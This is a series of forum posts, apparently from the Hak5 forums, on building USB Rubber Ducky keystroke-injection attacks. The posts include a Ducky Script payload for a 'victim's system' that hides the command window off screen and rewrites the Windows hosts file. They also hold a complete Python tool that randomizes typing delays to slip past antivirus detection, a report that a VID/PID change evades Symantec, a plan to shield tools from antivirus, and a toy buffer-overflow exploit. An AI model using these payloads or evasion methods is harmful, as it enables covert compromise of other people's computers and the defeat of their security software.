Posts posted by overwraith

  1. There is a problem I foresee you having though. The USB mass storage part does not show up for a while, so you may end up having to make a batch loop which waits for the USB mass storage to mount. The following code I made on the fly, so it probably won't work, but will show you more or less what to do to get this working.

    REM Batch file: loop until a volume labelled DUCKY has mounted.
    REM Inside a .bat file the for variable is written %%d (at an interactive prompt it is %d).
    :while1
    for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
    if defined myd goto break
    REM Pause about a second between polls instead of spinning (ping is the classic batch sleep).
    ping -n 2 127.0.0.1 >nul
    goto while1
    :break
    REM Continue script. %myd% now holds the drive letter, e.g. J:
  2. Thanks for all the responses; they'll definitely guide me towards what I need =).

    The process itself wouldn't need to be uniform on all OS's; I'm mostly just looking for the easiest way to get the file on the computer and execute it.

    By chance, is it possible to have the .jar on the microSD card itself and have the ducky retrieve it? I'm guessing no, but I thought I'd ask.

    You need to flash your duck with specialized firmware that midnightsnake has made. I think Twin Duck will work. It is now possible to have composite HID/Mass storage devices.

  3. As far as executing the jar file, there is probably no uniform way to navigate to each OS's command prompt that is the same for all of them. The number of scripts required to execute on different OS's can be minimized however by sticking to key sequences that are common to subsequent versions of the OS. For instance, one can probably make a script that works on Windows XP, and Vista, and Windows 7, but not Linux. Also, one can probably make one script that works on all or many flavors of Linux. I foresee 3 end scripts, one for Windows, one for Linux, and one for OS X. Twin duck can probably hold all the JRE files necessary. Portable apps may even have some form of portable JRE software. It may be worth it to look online for any kind of silent install procedure as well. I know that Python has a silent install.

  4. Never mind, I answered my own question. According to Google, there is no female USB to Bluetooth connector, because the connector would have to be able to convert the keyboard traffic into Bluetooth traffic. It would be really cool though if the USB Rubber Ducky could be made to use Bluetooth, for a more remote attack. Ex. wait for the victim to login, then press a button on the ducky to trigger the payload. I have no idea if it would work, and no idea if there is any kind of setup procedure for Bluetooth keyboards that would prevent this type of thing.

  5. I just tried the VID/PID change on Symantec Endpoint Protection, and I can verify that the change does work. Are there any other ways the antivirus companies can block us, so we can get ahead of the curve in preventing the antivirus companies from blocking us?

    -If they take into account the speed at which we type the payloads, we can create bash scripts to randomize the delay values between commands or even letters. Could even modify the duck script language to do it automatically.
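    The post above suggests randomizing the DELAY values between commands or even between letters. The following is an added example for this thread, not overwraith's code and not part of the Hak5 encoder: a Python script that rewrites a Ducky Script with jittered timing before it is handed to encoder.jar. The sample payload embedded in it is constructed (a trimmed version of the hosts-file payload on this page), and the command set it understands (STRING, DELAY, ENTER, GUI, REM, REPEAT) is an assumption based on the syntax used here.

```python
"""Randomize the timing of a Ducky Script before it is encoded.
Added example for this thread: not overwraith's code and not part of the
Hak5 encoder. It assumes only the Ducky Script commands used on this page
(STRING, DELAY n, ENTER, GUI r, REM, REPEAT n)."""
import random
import re

# Constructed sample: a trimmed version of the hosts-file payload on this page.
SAMPLE = """REM constructed sample payload
GUI r
STRING cmd /K
DELAY 500
ENTER
DELAY 750
STRING exit
ENTER
"""

_DELAY = re.compile(r"^DELAY\s+(\d+)\s*$")
_STRING = re.compile(r"^STRING (.*)$")  # payload is everything after the single space


def _jittered(value, spread, rng):
    """Rescale an existing delay by a random factor in [1-spread, 1+spread], never below 1 ms."""
    lo = max(1, int(value * (1 - spread)))
    hi = max(lo, int(value * (1 + spread)))
    return rng.randint(lo, hi)


def _split_keeping_spaces(payload):
    """Split STRING text into one-character chunks, gluing spaces to a
    neighbouring character so no emitted STRING line is whitespace-only."""
    chunks, pending = [], ""
    for ch in payload:
        if ch == " ":
            if chunks:
                chunks[-1] += ch
            else:
                pending += ch
        else:
            chunks.append(pending + ch)
            pending = ""
    if pending:
        chunks.append(pending)
    return chunks


def jitter_script(text, spread=0.4, gap=(40, 160), per_char=(15, 60), seed=None):
    """Return the script with randomized timing:
    - every DELAY n is rescaled by +/- spread;
    - a random DELAY from gap is inserted between commands that had none;
    - each STRING is typed one character at a time with a random per_char
      delay, so the keystroke cadence is no longer constant.
    REM lines pass through. A REPEAT repeats the line above it, so no DELAY
    is inserted before one and the STRING preceding it is kept whole."""
    rng = random.Random(seed)
    lines = [l for l in text.splitlines() if l.strip()]
    out, last_was_delay = [], False
    for i, line in enumerate(lines):
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        if line.startswith(("REM", "REPEAT")):
            out.append(line)
            continue
        m = _DELAY.match(line)
        if m:
            out.append(f"DELAY {_jittered(int(m.group(1)), spread, rng)}")
            last_was_delay = True
            continue
        if out and not last_was_delay:
            out.append(f"DELAY {rng.randint(*gap)}")
        m = _STRING.match(line)
        if m and not nxt.startswith("REPEAT"):
            for j, chunk in enumerate(_split_keeping_spaces(m.group(1))):
                if j:
                    out.append(f"DELAY {rng.randint(*per_char)}")
                out.append(f"STRING {chunk}")
        else:
            out.append(line)
        last_was_delay = False
    return "\n".join(out) + "\n"


def typed_strings(text):
    """The text a script actually types, merged across the per-character
    split; lets you check that jittering changed timing, not keystrokes."""
    runs, buf = [], ""
    for line in text.splitlines():
        m = _STRING.match(line)
        if m:
            buf += m.group(1)
        elif not _DELAY.match(line):
            if buf:
                runs.append(buf)
            buf = ""
    if buf:
        runs.append(buf)
    return runs


if __name__ == "__main__":
    print(jitter_script(SAMPLE, seed=7), end="")
```

    Redirect the output to a file and encode that instead of the original. The delay ranges are tunable; pushing the per-character delay far below what a human typist produces defeats the point, and a fixed seed is only for reproducing a run, so leave it unset for real use. Because REPEAT repeats the command immediately above it, the script deliberately keeps a STRING whole and inserts no DELAY when a REPEAT follows.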

  6. Midnight snake showed me an improvement to the command line drive finding code;

    J:\>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
    
    J:\>echo %myd%
    J:

    This was part of what one of his firmware versions would automatically type in. So instead of using my for loop, we can use this loop which looks for a volume labeled "DUCKY". This means we don't need the text file on the root of the drive anymore.

  7. Is the jar file in the same directory as the directory you are running the command from? The file either has to be in the same directory that you are using it, or you need to put the full path before the encoder name.

    
    Try the following first:
    java -jar encoder.jar /?
    
    I think this will fix your problem: 
    
    java -jar J:\folderName\encoder.jar -i inputFile -o outputFile

    A way to get around this is to put the encoder someplace like on your system drive's root, and add the encoder's file to the system path.

  8. The webpage (http://www.usbrubberducky.com) should be fixed eventually, as are most things on the internet.

    First watch the Quack Start video here:

    http://hakshop.myshopify.com/products/usb-rubber-ducky

    Then read through the Duck Script Syntax here:

    http://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript

    Then Read through a few payloads here (only execute them if you know what they're doing):

    http://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

    Then search through the forums here, I'm sure there's something on getting started here somewhere.

    To compile a duckscript, use the following syntax on the command line:

    java -jar encoder.jar -i E:\folder\inputFile.txt -o E:\inject.bin

    Someday you will want to learn about flashing, midnitesnake is the person to see about that. You can send him a message using the forum tools at the top of the screen.

    I'm sure other people will have good advice too...

  9. Yes, but the delays may be necessary on your victim's system.

    REM Author:ashbreeze96 and overwraith
    CONTROL ESCAPE
    STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
    DELAY 500
    ENTER
    DELAY 750
    ALT SPACE
    STRING M
    DOWNARROW
    REPEAT 100
    ENTER
    DELAY 50
    STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
    DELAY 50
    ENTER
    DELAY 50
    STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
    DELAY 50
    ENTER
    STRING exit
    ENTER

  10. What does CTRL+SHIFT+ENTER do?

    Additionally further down the forum at this link http://forums.hak5.org/index.php?/topic/28463-the-duck-and-the-rick-role/

    we made some additional modifications to a script that does essentially the same thing. Some of the noteworthy improvements include using GUI R instead of CONTROL ESC to allow this to operate on non-Vista/Win7 devices. I think we also added a newline so we don't append to the end of the current line, and we also used a snippet that hides the command window below the bottom of the screen.

    REM Author:ashbreeze96 and overwraith
    GUI R
    STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
    DELAY 500
    ENTER
    DELAY 750
    ALT SPACE
    STRING M
    DOWNARROW
    REPEAT 100
    ENTER
    STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    STRING exit
    ENTER

    The script in the linked forum post had a lot of delays that aren't usually necessary on my system.

  11. Some software security flaws are generated by lazy coding practices though. Nearly all hacks prey on coding flaws. A buffer overflow (most prevalent in C and C++ languages) for instance is a case where a coder has neglected to check the length of a user's input to the program. The data is written without checking whether or not it will overwrite things after the allocated buffer space, thus rewriting a return address after the buffer. If input is cleverly crafted, a buffer overflow situation can be used to run code that the programmer of the victim program didn't code. This is done by injecting shellcode into the buffer, and a return address which is written after the buffer to point back into the buffer, thus redirecting the flow of execution. I think Java is probably written in C/C++ or something, as all our computer languages have a hierarchy of evolution. Machine code was first, then came Assembly, and then came compiled languages, which are sometimes used to write more complex compiled languages. Improper verification is also the cause of several more modern types of attacks including cross site scripting, SQL Injection, and XML injection. It can be difficult to catch all coding flaws before release, because of the sheer size of the source code. Programs can be hundreds to thousands of lines. Format String Exploits, also prevalent in C and C++, are also an error associated with incorrect input verification. Format String Exploits involve allowing the user to input '%' symbols into a printf format string.
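    The post above describes the mechanics of a stack-buffer overflow: input copied without a length check runs past the buffer into the saved return address, and a crafted input puts shellcode in the buffer and a return address that points back at it. The following is an added example, not from the post: a Python model of one stack frame as raw bytes, with the unchecked copy beside the length-checked one. The frame layout, addresses and shellcode marker are made up for the illustration.

```python
"""Toy model of the stack-buffer overflow described in the post above.
Added example, not from the post. One stack frame is modelled as raw bytes:
a fixed-size input buffer immediately followed by the saved return address,
the layout the post describes. A tiny "CPU" then returns by reading that slot.
The unchecked copy lets a long input overwrite the slot; the length-checked
version refuses it. Addresses and the shellcode marker are made up."""
import struct

BUF_SIZE = 16                      # bytes the programmer allocated for input
RET_SIZE = 8                       # 64-bit saved return address
FRAME_SIZE = BUF_SIZE + RET_SIZE
BUF_ADDR = 0x7FFF_0000             # pretend stack address of the buffer
LEGIT_RET = 0x0040_1234            # where the caller expects to resume
SHELLCODE = b"\xcc\xcc\xcc\xcc"    # stand-in for injected code (four int3 bytes)


def new_frame():
    """Fresh frame: zeroed buffer, legitimate return address already saved."""
    return bytearray(BUF_SIZE) + struct.pack("<Q", LEGIT_RET)


def copy_unchecked(frame, data):
    """The bug: strcpy-style copy that trusts the input length.
    Bytes past the buffer land on the saved return address."""
    n = min(len(data), FRAME_SIZE)  # bytes beyond the frame are outside this model
    frame[:n] = data[:n]
    return True


def copy_checked(frame, data):
    """The fix: refuse anything that does not fit in the buffer."""
    if len(data) > BUF_SIZE:
        return False
    frame[:len(data)] = data
    return True


def saved_return(frame):
    """Read the return address slot that sits right after the buffer."""
    return struct.unpack("<Q", frame[BUF_SIZE:FRAME_SIZE])[0]


def ret(frame):
    """What happens when the function returns through this frame."""
    target = saved_return(frame)
    if target == LEGIT_RET:
        return "caller"
    if BUF_ADDR <= target < BUF_ADDR + BUF_SIZE:
        off = target - BUF_ADDR
        if frame[off:off + len(SHELLCODE)] == SHELLCODE:
            return "shellcode"     # control flow redirected into the input
    return "crash"                 # garbage address, no mapped code there


def build_exploit():
    """Shellcode at the start of the buffer, padding to fill the rest, then
    the overwritten return address pointing back at the buffer."""
    pad = b"A" * (BUF_SIZE - len(SHELLCODE))
    return SHELLCODE + pad + struct.pack("<Q", BUF_ADDR)


def run(copy_fn, data):
    """Copy data into a fresh frame with copy_fn and report where the return goes."""
    frame = new_frame()
    if not copy_fn(frame, data):
        return "rejected"
    return ret(frame)


if __name__ == "__main__":
    for label, data in [("benign", b"hello"), ("long junk", b"A" * FRAME_SIZE),
                        ("crafted", build_exploit())]:
        print(f"{label:10} unchecked={run(copy_unchecked, data):10} "
              f"checked={run(copy_checked, data)}")
```

    On a real target the same idea runs into stack canaries, a non-executable stack (DEP/NX) and ASLR, so modern exploitation needs more than pointing the return address at the buffer; the bounds check in copy_checked is still the fix the post is pointing at.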

  12. I had a good idea a while ago: would it be possible to make a USB Rubber Ducky firmware variant that has mass storage support, but write protects the mass storage? This would be good if somebody wanted to insulate their hack tools from antivirus software. Perhaps if the executable files are discoverable by one antivirus brand, but not another, and you don't know which antivirus software you are facing in the field.
